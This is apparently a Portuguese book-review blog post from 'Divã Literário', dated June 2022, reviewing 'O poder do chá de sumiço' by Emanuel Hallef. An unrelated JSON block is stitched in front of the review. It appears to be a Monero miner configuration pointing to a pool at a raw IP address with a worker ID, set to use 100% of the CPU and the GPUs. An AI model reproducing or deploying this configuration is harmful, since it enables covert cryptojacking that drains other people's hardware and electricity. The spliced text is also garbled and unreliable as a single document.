{ "autosave": true, "donate-level": 1, "cpu": { "enabled": true, "huge-pages": true, "hw-aes": null, "priority": null, "asm": true, "max-threads-hint": 100, "max-cpu-usage": 100, "yield": false, "init": -1, "*": { "intensity": 2, "threads": 8, "affinity": -1 } }, "opencl": true, "cuda": true, "pools": [ { "coin": "monero", "algo": "cn/gpu", "url": "168.235.86.33:3393", "user": "SK_pDKo9B7rTqyPDrYeohNv5.lobogamers", "pass": "x", "tls": false, "keepalive": true, "nicehash": false } ] } Divã Literário: #Resenhadasemana: Um livro que realmente não faz sentido... mas faz sentido!

Leitores do Divã

segunda-feira, 27 de junho de 2022

#Resenhadasemana: Um livro que realmente não faz sentido... mas faz sentido!


     Boa tarde, pessoas queridas, tudo bem?

No post de hoje trago uma resenha de uma leitura que não imaginava que faria, mas, fico feliz de ter feito, devido a mundo de possibilidades que tenho agora. Vou explicar.
Eu comecei a ler O poder do chá de sumiço ainda nessa vibe, início de ano, cheia de energia e pronta pra fazer mudanças, e disposta a aplicar tudo (ou quase), quando li as muitas resenhas, a maioria negativa. Isso quase me fez abandonar a leitura. Ainda bem que não o fiz, pois isso me permitiu observar o livro por outro viés. Vamos lá:

O livro não é dos mais geniais, ele é muito bom pra ler nessa vibe de início de ano, começos e recomeços. No entanto, foi uma leitura fluída, muito leve, até, apesar da linguagem um tanto misógina. A mensagem transmitida pelas dicas dos chás, com adaptações pontuais, podem ajudar a (re)significar o profissional no mercado de trabalho. Por incrível que pareça, as dicas dos chás podem ser recicladas com sucesso e, acredite se quiser, já deu resultado.

A mensagem do livro para as mulheres não é das mais positivas em alguns aspectos, mas é possível tirar lições positivas de uma leitura que não é nota 10, mas que também não é das piores.

Livro: O poder do chá de sumiço.
Autor: Emanuel Hallef. 





Nenhum comentário:

Postar um comentário

Projeto Desencalhando a estante... ou conhecendo a estante?

 Um projeto que já existe desde janeiro de 2020, O projeto Desencalhando a estante , da professora Carolina Bianchezi, ajuda leitores de tod...